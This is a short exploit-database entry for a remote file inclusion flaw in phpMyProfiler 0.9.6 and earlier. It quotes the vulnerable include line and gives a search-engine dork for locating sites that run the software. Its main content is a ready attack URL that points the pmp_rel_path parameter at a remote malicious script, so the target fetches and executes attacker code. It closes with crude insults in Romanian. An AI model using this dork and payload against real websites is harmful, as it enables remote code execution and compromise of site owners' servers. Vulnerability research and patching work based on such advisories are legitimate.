id: 916
date: 10/02/2006
title: phpMyProfiler <= 0.9.6 Remote File Include Vulnerability
author: mozi
cves: 

========================================================
phpMyProfiler <= 0.9.6 Remote File Include Vulnerability
========================================================



# phpMyProfiler Remote File Inclusion Vulnerability
------------------------------------------------------------------
Download: http://sourceforge.net/projects/phpmyprofiler
------------------------------------------------------------------
require_once($pmp_rel_path . '/include/PEAR/HTTP.php');
_________________________________________________________________
googledork:phpMyProfiler

http://site.com/[path]/functions.php?pmp_rel_path=http://[Evil_script]

PS:Whitehat aia de pe undernet sug pula!!!  Lameri boratzi
#phpfreaks rulz
# heh tnx




#  0day.today [2023-03-21]  #